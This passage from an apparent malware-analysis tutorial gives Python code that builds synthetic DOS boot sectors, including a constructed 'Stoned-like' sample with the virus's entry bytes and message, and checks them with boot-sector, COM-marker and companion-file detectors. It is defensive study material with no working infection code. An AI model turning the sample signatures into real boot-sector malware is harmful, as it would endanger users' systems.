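    struct.pack_into("<HBHBHHBHHHH", sec, 11, 512, 1, 1, 2, 64, 320, 0xFE, 1, 8, 1, 0)
    sec[510:512] = BOOT_ID
    return bytes(sec)


def build_stoned_like_sector() -> bytes:
    """Constructed sample: the same sector carrying the Stoned entry bytes and message."""
    sec = bytearray(build_norton_sector())
    sec[0:5] = b"\xea\x05\x00\xc0\x07"
    sec[0x100:0x100 + len(STONED_MSG)] = STONED_MSG
    return bytes(sec)


if __name__ == "__main__":
    print(parse_bpb(build_norton_sector()))
    print(inspect_boot_sector(build_stoned_like_sector()))
    print(inspect_com(b"\xeb\x02\xda\xca" + b"\x90" * 16))
    print(find_companions(["GAME.EXE", "GAME.COM", "EDIT.EXE", "SORT.COM"]))
```

On a real disk image the same checks run over the first 512 bytes of the image (sector 1, side 0) and, for the Stoned hard-disk case, over the copy it hides at track 0, sector 7.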